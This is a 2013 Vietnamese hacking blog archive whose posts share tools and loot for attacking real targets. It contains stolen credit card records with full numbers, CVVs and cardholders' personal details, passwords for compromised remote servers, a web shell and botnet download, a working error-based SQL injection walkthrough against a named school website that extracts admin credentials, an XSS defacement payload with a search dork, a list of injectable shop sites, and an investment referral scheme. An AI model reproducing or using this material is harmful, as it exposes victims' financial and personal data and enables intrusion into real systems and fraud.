phimheo: 2013

Thứ Tư, 3 tháng 7, 2013

sms chúc thi tốt

Một mùa thi đại học, cao đẳng nữa lại sắp đến, blog SMS chuc thi tot xin gửi lời chúc chân thành đến tất cả các thí sinh, chúc các thí sinh có một mùa thi đại học , cao đẳng 2013 đạt kết quả thành công mỹ mãn

Còn chần chờ gì nữa, hay nhanh tay tải các mẫu tin nhan chuc thi tot , SMS chuc thi tot để gửi tặng bạn bè và người thân yêu của bạn vững vàng, tự tin trong kỳ thi đại học sắp tới nào
Dưới đây là các mẫu SMS chuc thi tot dành cho điện thoại, phù hợp với tất cả các dòng máy điện thoại hiện nay từ 1202 cho đến điện thoại cảm ứng Android, Window Phone hay IOS

Tải ngay

Thứ Bảy, 22 tháng 6, 2013

Free domain .NU [TESTED]

site : http://directregister.com/ đuôi chỉ có . NU thôi nhé reg xong thì anh em mail support bảo nó kích hoạt tính năng change nameserver lên rồi DNS nó đi đâu thì đi site reg 1 năm

Chủ Nhật, 16 tháng 6, 2013

share con shell đa chức năng

download:

https://www.dropbox.com/s/mzibcj1o1dbyi6u/ceh9x.php

pass login shell: ceh9x

Thứ Bảy, 15 tháng 6, 2013

Hacking Tools tổng hợp (local, shell, tools,...)

Tổng hợp đủ loại mới nhất...
Ảnh ae nhà nó đây
http://www34.zippyshare.com/v/77328422/file.html

Thứ Sáu, 14 tháng 6, 2013

ít paypal uncheck cho ae

Thứ Ba, 11 tháng 6, 2013

CCV Part 2

Live =>[ElectronicPromo.Net] Live - Bill True | 25225 | 28794 | larryaxiotis | 4741658000045808 | 06 | 14 | 550 |laxiotis@aol.com | larry | axiotis | larryaxiotis | palacerestaurant | 3250EASTONAVE | bethlehem | 18020 | PA | US | 6108610404 | 6108612544 | => Info Bank: |UNKNOW|DEBIT BUSINESS|UNITED_STATES|
Live =>[ElectronicPromo.Net] Live - Bill True | 25349 | 28927 | kademislinski | 371556604451007 | 08 | 15 | 6148 |krgroup@me.com | kade | mislinski | kademislinski | kadencerestaurantgroup | 266eastCongressStreet | HUBRestaurant&IceCreamery | Tucson | 85701 | AZ | US | 5202078201 | => Info Bank: |BANK OF AMERICA|CREDIT NA|UNITED_STATES|314 4666117

share ccv ae,nhanh tay thì được nhá

Live =>[ElectronicPromo.Net] Live - Bill True | 24985 | 28538 | JosephLaRue | 4802071250006494 | 02 | 14 | 436 |jlarue@mmxperts.com | Joseph | LaRue | JosephLaRue | MaterialManagmentXpertsInc. | 421011thStreet | Rockford | 61109 | IL | US | 8153973600 | 815-397-3663 => Info Bank: |U.S. BANK, N.A.|DEBIT BUSINESS|UNITED_STATES|
Live =>[ElectronicPromo.Net] Live - Bill True | 25065 | 28618 | LauriMartin | 378296952081014 | 11 | 15 | 4231 |holidayinn.mh@magnessoil.com | Lauri | Martin | LauriMartin | MagnessOil | 167TuckerCemeteryRoad | Gassville | 72635 | AR | US | 8704254353 | 870-425-6286 => Info Bank: |AMERICAN EXPRESS COMPANY|CREDIT CORPORATE|UNITED_STATES|18005284800
Live =>[ElectronicPromo.Net] Live - Bill True | 25088 | 28641 | CynthiaSalvacion | 378361533701116 | 09 | 15 | 6168 |cynthia@hafco.net | Cynthia | Salvacion | CynthiaSalvacion | Hafco&Associates | 6334WilshireBlvd. | LosAngeles | 90048 | CA | US | 3236510909 | | | | => Info Bank: |UNKNOW|CREDIT PLATINUM|EUROPEAN_UNION|

Thứ Hai, 10 tháng 6, 2013

Hướng Dẫn cài botnet bằng video

Download : http://adf.ly/QLAhS
RC4 KEY:d40e75961383124949436f37f45a8cb6

Thứ Bảy, 8 tháng 6, 2013

Share ít VPS cho ae

cách dùng:
start > programs > acessories > remote desktop connection
nhập ip và nhập user + pass

184.75.18.5
@conference ;conference usa

38.103.43.73
@conference ;conference usa

77.28.98.47
@user ;user

203.132.203.220
@scan ;scan

How To Hack DJ.NHACSAN.IN

[Hacking tutorial]SQLMAP Tutorial by KunGa

Thứ Bảy, 1 tháng 6, 2013

Wap Phim Sex Dành Cho Điện Thoại

Sau gần 2 tuần chạy thử nghiệm hôm nay 01/06/2013 truyensex321 chính thức ra mắt phiên bản Wapsite TruyenSex321 ver 1.0 .
I. Sứ mệnh truyensex321 – Sinh ra phục vụ cộng đồng
- Cung cấp Truyện sex hay mới nhất,hot nhất về tất cả lĩnh vực trong cuộc sống .
-Kho Phim sex Tải Phim Sex miễn phí ,đầy đủ cho tất cả dòng điện thoại di động .
- Truyện sex với đủ thể loại và cốt truyện cực hấp dẫn .
II.Mục đích của truyensex321 – Phục vụ cộng đồng
-Xây dựng wapsite chuyên biệt về tin tức ,phần mềm ,truyện dành cho các bạn sử dụng dtdd . Các bạn có thể tìm kiếm ở chúng tôi tất cả mọi thứ mà không cần tìm kiếm ở wapsite nào khác
-Khi mà xu hướng wap việt đang bão hòa truyensex321 mong muốn tạo làn gió mới trong việc sử dụng wap,cũng như đầy đủ nhất cho người dùng
-Hướng nhiều tới tâm lí thân thiện người sử dụng
III.Lợi ích đem lại- Hoàn toàn miễn phí
-Giúp bạn không bõ lỡ bất cứ sự kiện tin tức về đời sống đang diễn ra
-Ứng dụng phong phú giúp cho điện thoại của phát huy được tất cả tính năng.
-Cốt truyện hấp dẫn được truyền tải tới các bạn bằng 1 giao diện thân thiện. Giúp việc theo dõi của bạn dễ dàng hơn
IV.Về truyensex321- Chúng tôi luôn cần bạn
- truyensex321 thực hiện bới đôi ngũ thành viên có nhiều năm gắn bó với wap việt
- Phiên bản 1.0 chúng tôi xây dựng trên đánh giá đông đảo của người dùng wap.Vì thế chúng tôi luôn mong mỏi ý kiến đóng góp của các bạn để hoàn thiện hơn.
- Chúng tôi đề cao sự thoải mái cho người dùng vì thế chúng tôi cam kết sẽ popup trên truyensex321.

Thứ Hai, 27 tháng 5, 2013

Cảnh báo sở xây dựng tỉnh hậu giang

Cảnh Báo DaiHocTrucTuyen.Edu.Vn

Thứ Sáu, 26 tháng 4, 2013

[26-04-2013] Share Key Kaspersky cho ae

Tềnh hềnh là Kun share ít key kiss, ko sài đừng nói lời cay đắng

khoảng 70 key,ae sài từ từ ko thì nghẹn nha
đủ loại phiên bản,ae vào site này check key nhóa
http://www.kavkiskeychecker.com/

tải về nhoa
https://docs.google.com/file/d/0B59IM2NHYThaODM1MW1YVnJZekU/edit

cách sử dụng thì là:
ae rút cable mạng ra,không cho nó kết nối internet,rồi làm như hình sau

---------- Post added at 10:53 PM ---------- Previous post was at 10:52 PM ----------

Thứ Sáu, 19 tháng 4, 2013

[TUT]Standard Error Base Injection

n this tutorial I want to discuss and use standard error base injection .All tutorials I see in the forums use double query error base injection and all of them use same method and same syntax so I decide make a tutorial for this method it's pretty basic and easy to fallow

As I know all of you know about column count and basic sqli so I ignore it and start inject my target to find version but it's get us this error

Code:
The used SELECT statements have a different number of columns

So we use error base to inject this

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by  concat_ws(0x7e7e,version(),user(),database(),floor(rand(0)*2)) having  min(0) or 1--

Spoiler (Click to View)

It's version >5 so we can use information _schema to find tables
before find tables we can count number of database to see our target have how many DB
We can use SQL's COUNT() function to count number of DB's ,tables , columns or even number number of existing user in database . For more info Click here

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select count(schema_name) from  information_schema.schemata limit 0,1),floor(rand(0)*2)) having min(0)  or 1--

Spoiler (Click to View)

For extract db I use the fallowing

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select concat(schema_name) from  information_schema.schemata limit 0,1),floor(rand(0)*2)) having min(0)  or 1--

Spoiler (Click to View)

With playing limit we can find another value name of databse

Code:
limit 0,1 for first exicting things
limit 1,1 for two exicting things
.
.
.
limit (N-1),1 for N exicting things

Now you should ask yourself why I write (n-1) to find N value ?
That's simple cuse we start extracting first value with getting 0 so for finding N values we should we have to decline our numbers

Now lets count tables and read table names

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select count(table_name) from  information_schema.tables where table_schema=database() limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select concat(table_name) from  information_schema.tables where table_schema=database() limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

Now we have table names so start to count and find column names from admin table

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select count(column_name) from  information_schema.columns where table_name='admin' limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

As you can see the magic quotes protect is off so we can use single or double quote in our syntax for add our name

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,'<script>alert("lols are  here");</script>',(select count(*) from admin limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select concat(column_name) from  information_schema.columns where table_name='admin' limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

The last thing we should do for inject it's read admin info before that lets see the admin table have how many users

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select count(*) from admin limit  0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

I use this syntax for find out number of the users of online game web site and it gives me this result

Spoiler (Click to View)

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select concat_ws(0x7e,username,pass)  from admin limit 0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

Two thing before end up this tutorial
I'm not going deep into it in union base we add null byte to inject our query into Database in error base union null byte isn't work but floor(rand(0)*2) do this thing to us in error base for more info fallow the links bellow

http://www.w3resource.com/sql/arithmetic...-value.php
http://php.about.com/od/mysqlcommands/g/floor_sql.htm
http://www.w3schools.com/sql/sql_func_round.asp
and master off all knowledge Click me

And there is one other common problem happens when going to extract value from specific table here is

Code:
[url="http://stackoverflow.com/questions/12597620/1242-subquery-returns-more-than-1-row-mysql"]  [/url][i]Subquery[/i] returns [i]more than 1 row

for bypass and pass the error and get our gool's we can use substring to extract value

Code:
substring(DATA, STARTLEGNTH, ENDLENGTH)

it's look like something like this in our target if it get's us the error like this

Code:
http://www.sanskrititheschool.org/gallery.php?id=126  or 1 group by concat_ws(0x7e7e,(select  concat(substring((concat_ws(0x7e,username,pass)),1,50),0x7e) from admin  limit 0,1),floor(rand(0)*2)) having min(0) or 1--

Spoiler (Click to View)

As you can see I use substring((concat_ws(0x7e,username,pass)),1,50)
1 is first character of values who we want to extract
50 is end of the string value if characters more than 50 you can Increase it.

In the end I dont add any pic and think its not necessary but if you want it can be done soon
For another method of error base look at my signature
hope this can help :)

Thứ Năm, 18 tháng 4, 2013

Xss wordpress in WP-Cumulus

Xin chào,mình là KunGa,lâu rồi không cập nhật blog nên viết 1 tut về xss ở plugin WP-Cumulus
dork:inurl:wp-content/plugins/wp-cumulus/tagcloud.swf
ví dụ mình tìm ra 1 site như sau:
http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf
mình thay vào đoạn này:

tagcloud.swf?mode=tags&tagcloud=<tags><a+href%3D'https%3A%2F%2Fwww.facebook.com%2Findonesian.go.id'+style%3D'font-size%3A+40pt'>Hacked+By+KunGa<%2Fa><%2Ftags>

sẽ có link như sau:

http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27https%3A%2F%2Fkunga96.blogspot.com%2Findex%27+style%3D%27font-size%3A+40pt%27%3EHacked+By+KunGa%3C%2Fa%3E%3C%2Ftags%3E

là kết quả là:
http://e4god.com/wordpress/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href%3D%27https%3A%2F%2Fkunga96.blogspot.com%2Findex%27+style%3D%27font-size%3A+40pt%27%3EHacked+By+KunGa%3C%2Fa%3E%3C%2Ftags%3E
các bạn tự kiểm nha nhé

Thứ Bảy, 13 tháng 4, 2013

Acunetix Web Vulnerability Scanner

Acunetix là một công cụ cực kỳ hữu ích dành cho :

* Các webmaster để kiểm tra lỗi cho ứng dụng web của mình
* Các nhà quản trị server dùng để kiểm lỗi cho ứng dụng web chạy trên server để đưa ra các cảnh báo kịp thời cho các webmaster Acunetix có thể hổ trợ bạn.
* Tìm kiếm lỗi của một website: SQL Injection, XSS…
* Tìm kiếm cấu trúc của một website.
* Tìm kiếm lỗi của server chứa website và các thông tin liên quan đến server của website.
* Báo cáo cũng như gợi ý chỉnh sửa các lỗi của website.
* Lưu các kết quả báo cáo cho việc fix lỗi sau này.
* Lập lịch tiến hành scan lỗi cho website.
* Cùng nhiều công cụ hổ trợ fix lỗi website khác.

This image has been resized. Click this bar to view the full image. The original image is sized 1024x576.

Download : http://www.mediafire.com/?icapdgt44d95t7n
Pass giải nén : 123456

Dưới đây là những tính năng của Acunetix, với bản mới này đã hỗ trợ tốt về Profile Upload như : Fckeditor...nếu website có dùng, scan gần như là sẽ ra hết.

Những lỗi mà Acunetix có thể phát hiện được:

Version Check

* Vulnerable Web Servers
* Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution.

CGI Tester

* Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
* Verify Web Server Technologies

Parameter Manipulation

* Cross-Site Scripting (XSS) – over 40 different XSS variations are tested.
* SQL Injection
* Code Execution(Unix and Windows)
* Directory Traversal (Unix and Windows)
* File Inclusion
* Script Source Code Disclosure
* CRLF Injection
* Cross Frame Scripting (XFS)
* PHP Code Injection
* XPath Injection
* Full Path Disclosure
* LDAP Injection
* Cookie Manipulation
* Arbitrary File creation (AcuSensor Technology)
* Arbitrary File deletion (AcuSensor Technology)
* Email Injection (AcuSensor Technology)
* File Tampering (AcuSensor Technology)
* URL redirection
* Remote XSL inclusion

MultiRequest Parameter Manipulation

* Blind SQL/XPath Injection

File Checks

* Checks for Backup Files or Directories – Looks for common files (such as logs, application traces, CVS web repositories)
* Cross Site Scripting in URI
* Checks for Script Errors

File Uploads

* Unrestricted File uploads Checks

Directory Checks

* Looks for Common Files (such as logs, traces, CVS)
* Discover Sensitive Files/Directories
* Discovers Directories with Weak Permissions
* Cross Site Scripting in Path and PHPSESSID Session Fixation.
* Web Applications
* HTTP Verb Tampering

Text Search

* Directory Listings
* Source Code Disclosure
* Check for Common Files
* Check for Email Addresses
* Microsoft Office Possible Sensitive Information
* Local Path Disclosure
* Error Messages
* Trojan shell scripts (such as popular PHP shell scripts like r57shell, c99shell etc)

Weak Passwords

* Weak HTTP Passwords

GHDB Google Hacking Database

* Over 1200 GHDB Search Entries in the Database

Port Scanner and Network Alerts

* Port scans the web server and obtains a list of open ports with banners
* Performs complex network level vulnerability checks on open ports such as:
o DNS Server vulnerabilities (Open zone transfer, Open recursion, cache poisoning)
o FTP server checks (list of writable FTP directories, weak FTP passwords, anonymous access allowed)
o Security and configuration checks for badly configured proxy servers
o Checks for weak SNMP community strings and weak SSL cyphers
o and many other network level vulnerability checks!

Other vulnerability tests may also be preformed using the manual tools provided, including:

* Input Validation
* Authentication attacks
* Buffer overflows
* Blind SQL injection
* Sub domain scanning

TUT hack shop ver 4

đầu tiên down cái tool này ( viết bằng perl )
http://pacenoge.org/tool/ssdp51.tar.gz
phần mềm hổ trợ :
http://www.perl.org/get.html
Hướng dẫn có kèm trong file ssdp51.tar.gz luôn nhưng post lên đây cho nó dài dài

Quote:

[INPUT]
-u [SQLi URL] target with id parameter or sqli url with c0li string
-e [sqli end tag] sql injection end tag (default: \"--\")
-d [database name] this option should not be used (default: \@\@database)
-t [table name] table_name
-c [columns name] column_name (example: id,user,pass,email)
-s [space code] SPACE code: +,/**/,%20 (default: \"+\")
-f [max field] max field to get magic number (default: 123)
-start [num] row number to begin dumping data
-stop [num] row number to stop dumping
-log [file name] file name to save ssdp data (default: ssdp.log)
-p [http proxy] hostname:port

[COMMAND]
-info Get MySQL Information [MySQL v4+]
-dbase Concat Databases [MySQL v5+]
-table Concat Tables [MySQL v5+]
-column Concat Columns [MySQL v5+]
-tabcol Concat Tables with Columns [MySQL v5+]
-find Search Columns Name [MySQL v5+]
-magic Find Magic Number [MySQL v4+]
-dump Dump Data [MySQL v4+]
-brute Fuzzing Tables & Columns [MySQL v4+]

--------------------------------------------------------------------------
Note:
[+] [COMMAND] should be in last position.
[+] -d [dbname] no need to used if the tables, columns or data you want to extract
is in the current database (@@database).

1. Find Magic Number / Null Column "-magic"
Required Options: -u
Optional: -s, -f, -e, -log, -p
Command: perl ssdp.pl -u [URL] [options] -magic
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=1" -magic
2) perl ssdp.pl -u "http://localhost/index.php?id=null" -s "/**/" -f 100 -e "/*" -p 127.0.0.1:8080 -magic

2. Gathering MySQL Information "-info"
Required Options: -u
Optional: -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -info
Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info

3. Concat Databases
Required Options: -u
Optional: -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -dbase
Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -dbase

4. Concat Tables
Required Options: -u
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -table
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -table
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -table

5. Concat Columns
Required Options: -u, -t
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -t wp_users -column
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -t wp_users -column

6. Concat Tables with Columns "-tabcol"
Required Options: -u
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -tabcol
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -tabcol
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -tabcol

7. Dump Data "-dump"
Required Options: -u, -t, -c
Optional: -d, -start, -stop, -where, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -start [num] -stop [num] -dump
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c password -dump
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c host,user,password -start 5 -stop 10 -dump

8. Special Dump Query "-where [query] -dump"
Required Options: -u, -t, -c
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -where [query] -dump
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "id=1" -dump
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "user=0x61646D696E" -dump
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "email like (0x257961686F6F25)" -dump

Information: [+] string value should be converted to hexadecimal ascii or decimal ascii before used (http://okedeh.co.tv)
[+] 0x61646D696E = "admin", 0x257961686F6F25 = "%yahoo%", char(99,48,108,105)
[+] Example MySQL Query: [-] select id,user,pass,email from mydb.user where user='admin';
[-] select id,user,pass,email from mydb.user where email like '%yahoo%';

9. Brute Tables & Columns "-brute"
Command: perl ssdp.pl -u [SQLi URL] -brute
Example: [+] perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -brute

10. Combine [COMMAND]
Command: perl ssdp.pl -u [SQLi URL] -[options]
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -table
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -tabcol

11. Still thinking on this one :/

còn đầy là cái video của not_higgle bên DF làm

Quote:

http://hotfile.com/dl/43823298/c827076/phpver4.rar.html

Thứ Năm, 21 tháng 3, 2013

[Video] Chiếm quyền điều khiển windows 7 với backdoor Trong backtrack

Tác giả: Phú Nguyễn Trường, đăng vào Thứ năm, ngày 21 tháng ba năm 2013

Hôm nay mình xin hướng dẫn các bạn Một hacker sẽ sử dụng backdoor để chiếm quyền điều khiển windows 7 như thế nào

Mình thực hành trên windows 7 32bit cho máy victim và backtrack 5 R3 cho máy attacker nhé
Chú ý máy victim đã tắt firewall và anti. Việc tạo backdoor vượt qua anti và firewall là có thể làm được
Nhưng mình sẽ không đề cập đến trong bài này. Mục đích bài này chỉ là xâm nhập windows 7 căn bản = backdoor.
Cách phòng tránh. Dùng antivirus có uy tín như KIS, Bit, AVAST,... Cập nhật CSDL thường xuyên cho anti
Nên sử dụng anti có tích hợp firewall đảm bảo như KIS, Avast.....
Nếu không hãy bật firewall của windows.
Cập nhật win thường xuyên
Không kích vào link lạ. Email lạ. không cắm USB lạ vào máy. Quét virus USB hay CD trước khi mở
Không dùng các soft lạ...

Tôi Làm video với mục đích khác phục lỗ hổng này để tránh những sự xâm nhập như tôi vừa làm. Tôi không chịu trách nhiệm nếu bạn nào lấy bài này làm mục đích phá hoại. Chú ý nhé

Thứ Ba, 19 tháng 3, 2013

List shop lỗi SQLI Update

http://www.jillmalek.com/ecommerce/list.php?id=6

http://www.worldofwebcraft.com/topic.php?id=287


http://www.wirelessresearch.eu/viewfile.php?id=1


http://www.webhostingtestimonials.com/hosts_name.php?id=1and1-reviews-ratings


http://www.fashione.co.uk/eng/downloads/page.php?id=458&name=Fashion%20Stock%20Management%20with%2030%20day%20free%20trial&subdomain=Downloads


http://www.dmarket.co.uk/a/index.php?id=43


http://www.adlib-recruitment.co.uk/Adlib/Vacancies/VacancyDetails.asp?VacancyID=2162


http://www.johnpaul.co.uk/event_details.php?ID=78


http://www.eia.org.uk/view.php?id=2499&cat=4&PHPSESSID=whdjyaoml


http://www.remassociates.co.uk/jobs.php?id=44


http://www.stockinventory.co.uk/page.php?id=1216&name=Styles%20Fact%20File&subdomain=Stock%20Inventory


http://clg.wlv.ac.uk/seminars/show-seminar.php?ID=209


http://www.vertexlaw.co.uk/news/detail.php?id=000187


http://www.yhmag.co.uk/garden_article.php?id=91


http://www.everrestmedia.ca/portfolio.php?ID=3&PHPSESSID=4785096b8f91b2bea69aeef61f56765a


http://cfortune.kics.bc.ca/templates/blue.city/index.php?id=19


http://www.nxlevel.ca/index.php?page=webpages&id=11&action=displaypage


http://www.eclickmedia.ca/products.php?id=10


http://ontariosnearnorth.on.ca/news.php?id=2


http://www.gunoxsoftware.ca/contents.php?id=%2095


http://www.seniorcreative.com.au/item.php?id=46


http://www.borderlinemusic.com/ecommerce/catDisplay.php?catID=2


http://free-lance.us/index.php?CatId=1


http://www.deals365.us/category.php?catid=72


http://www.pcjeweller.com/catalog.php?catid=2


http://www.vardhmansoft.com/web-development-company-india-portfolio.php?catid=19


http://www.sephix.net/general.php?catid=806


http://www.createmymerch.com/shops/shop/product_list.php?shopid=382&catid=1018


http://www.kaldata.net/comments.php?catid=3&id=35137


http://www.nylakatts-nfc.co.uk/links.php?catid=36


http://parcelpod.appliedstorageproducts.co.uk/product.php?catid=18&subpageid=45


http://www.voucher-mania.co.uk/deals.php?catid=273


http://www.womensaidnewry.co.uk/index.php?catid=46


http://www.genero.com.au/index.php?catid=11


http://www.saddleryoutlet.com.au/index.php?catalogue&catid=000158


http://www.id-joomla.com/forum?func=view&catid=52&id=158777


http://www.moderngent.com/onlinesales/product.php?product_id=55


http://www.ebizztemplates.com/product_details.php?product_id=325


http://www.thaimallplaza.com/shop/mainpage.php?page=webboard_ans&shop_id=139&f=48&post_id=403&qt=2&re_id=55178


http://directory.horadaily.com/web_detail.php?webid=66474


http://www.typografie.de/index.php?cPath=Stefan_Guzy:::21_181.html

Thứ Hai, 18 tháng 3, 2013

Nhận Dạy Bộ môn hacking

Trong Thời gian qua có nhiều mem có pm mình học bộ môn hacking do không có nhiều time nên ko thể đáp ứng được,bây giờ đã có thời gian rồi nên mình sẽ nhận dạy (ngày xưa có dạy free nhưng gặp nhiều ng ăn cháo đá bát nên sẽ không dạy free nữa)
Học phí như sau:
- hacking sql, xss, lfi, local : 50$/tháng
UG trọn bộ (all) : 400$/ khóa
1 khóa 6 tháng

Phương thức thanh toán: qua LR,Card hoặc baokim
Chi tiết liên hệ: Yahoo : Xao_lon_vn
P/s: giá Có Thể Fix (đối với các bạn sinh viên hoặc các bạn có đam mê mà không có đủ kinh tế)

Nhận Ship Hàng Elec pm : xao_lon_vn

Chúng Tôi Hoàn Toàn Không Chịu Trách Nhiệm Về Hành Vi Của Các Học Viên

Chủ Nhật, 17 tháng 3, 2013

[Auto] 0.01$ - 5$/ ngày - Ko cần đầu tư

Mình mới tìm được 1 phương pháp kiểm tiền tự động mà ko fải đầu tư vốn đây là proof của mình:

Name: 2iietc8.jpg Views: 40 Size: 30.2 KB

Đây là link của em nó: http://roxilia.com/
Cách chiến:
Đơn giản đây là 1 site invest. Nhưng nếu chưa có tiền đầu tư 1 người bạn giới thiệu thành công tài khoản sẽ đc +5$ bạn sẽ đc 0.2% của 5$ đó/day. vậy là 0,01$/ref/ngày. nếu giới thiệu đc nhiều số tiền sẽ tăng. và cứ thể hưởng % theo ngày mà ko fải làm gì cả?
Ủng hộ mình nhé!
http://roxilia.com/?ref=ROX6606904
Thanks!

Thứ Bảy, 16 tháng 3, 2013

Kiếm Tiền Với ADF.LY (white hat)

Adf.ly là gì ?
Adf.ly là trang rút gọn link tức họ sẽ làm link của bạn ngắn lại cho dễ nhìn và gọn hơn và bạn sẽ có thể kiếm tiền từ link này bằng việc chia sẻ nó với mọi người ví dụ như sau:
http://adf.ly/KwT1K –> Đây là link sau khi rút gọn của link
http://kunga96.blogspot.com/search/label/DDos Khi người nào click vào link của bạn và nhấn "Skip this ads" tới link gốc thì bạn sẽ kiếm được tiền.

Hình thức cũng khá đơn giản, bạn chỉ cần nhập đường dẫn (URL) vào Adf.Ly và sau đó Adf.Ly sẽ cho bạn một đường dẫn mới khá ngắn gọn của Adf.Ly, đường dẫn này khi truy cập sẽ dẫn đến đường dẫn gốc mà bạn đã add vào để rút gọn trước đó.
Giá trung bình là: $2.00 / 1000 lượt xem link của bạn, muốn biết chính xác giá cho từng vùng, từng quốc gia các bạn xem tại đây.

Sau khi rút gọn thật dễ dàng để đưa vào bài viết và chia sẻ với mọi người, rất đơn giản.
Còn tuyệt vời hơn thế nữa khi bạn còn được trả tiền nếu mọi người click vào link đó. Vì vậy đây là một cách kiếm tiền khá hay và hiệu quả, đặc biệt với bạn nào có website, blog, facebook hay forum...

Các điều kiện để kiếm tiền với Adf.Ly

Tài khoản PayPal hay AlertPay vì Adf.Ly chỉ thanh toán qua PayPal hoặc AlertPay. Nếu bạn chưa có tài khoản PayPal thì đăng ký tại đây và xem hướng dẫn đăng ký PayPal tại đây. Nếu bạn chưa có tài khoản AlertPay thì đăng ký tại đây và xem hướng dẫn đăng ký AlertPay tại đây
Nguồn visit, bạn có thể lấy visit từ nhiều nguồn khác nhau như:

Forum/Website/Blog cá nhân:
Upload file (phim, truyện, phần mềm ...)
Hay bất cứ nguồn visit nào mà bạn có

Đăng ký tài khoản Adfly

Huong dan dang ky kiem tien Adf.Ly ShortenURL

Sau khi có đủ các điều kiện trên thì các bạn bắt đầu đăng ký tài khoản Adf.Ly!
(Chú ý: Bình thường bạn cũng có thể rút ngắn link trên trang chủ adf.ly nhưng chỉ khi bạn đăng nhập và rút ngắn link thì link đó mới được tính tiền)

1. Click vào đây để bắt đầu đăng ký tài khoản riêng cho mình!
2. Trang chủ adf.ly hiện ra bạn click vào "Join Now".

3. Điền đầy đủ thông tin đăng ký như trong hình.
Khi khai báo tài khoản bạn nên khai báo không dấu. Trong phần Account Type chọn Link Shrinker ( mặc định, nếu chọn sai thì sau khi đăng ký xong vào account sửa lại cũng đc).

Your Name: tên của bạn

E-mail: địa chỉ email (dùng để login và nhận mã kích hoạt)

Retype E-mail: xác nhận địa chỉ E-mail

Username: tên tài khoản

Password: mật khẩu

Retype Password: điền lại mật khẩu

Account Type: Chọn Link Shrinker

Human Check: điền mã CAPTCHA

Sau khi hoàn thành thủ tục, tick chọn I Agree to... và bấm Join Now.

4. Nếu mọi thông tin bạn điền hợp lệ sẽ có thông báo đăng ký thành công và gửi mã kích hoạt tài khoản qua 1 email được gửi vào hòm thư bạn đã dùng để đăng ký.
Sau đó bạn vào email để lấy code kích hoạt tài khoản, bạn copy đoạn code mà adfly cung cấp cho bạn.
Click vào link dưới đoạn code để nhập code xác nhận vào

5. Các bạn nhập code vào khung Confirmation và nhấn Submit.

6. Sau khi add code bạn sẽ chuyển trang chủ như sau

Như vây thì việc đăng ký tài khoản của bạn đã hoàn tất, bây giờ bạn chỉ việc đăng nhập vào tài khoản và bắt đầu kiếm tiền. Mình chia sẻ chi tiết bên dưới cách kiếm tiền thông qua rút gọn link và giới thiệu đến bạn bè của bạn.

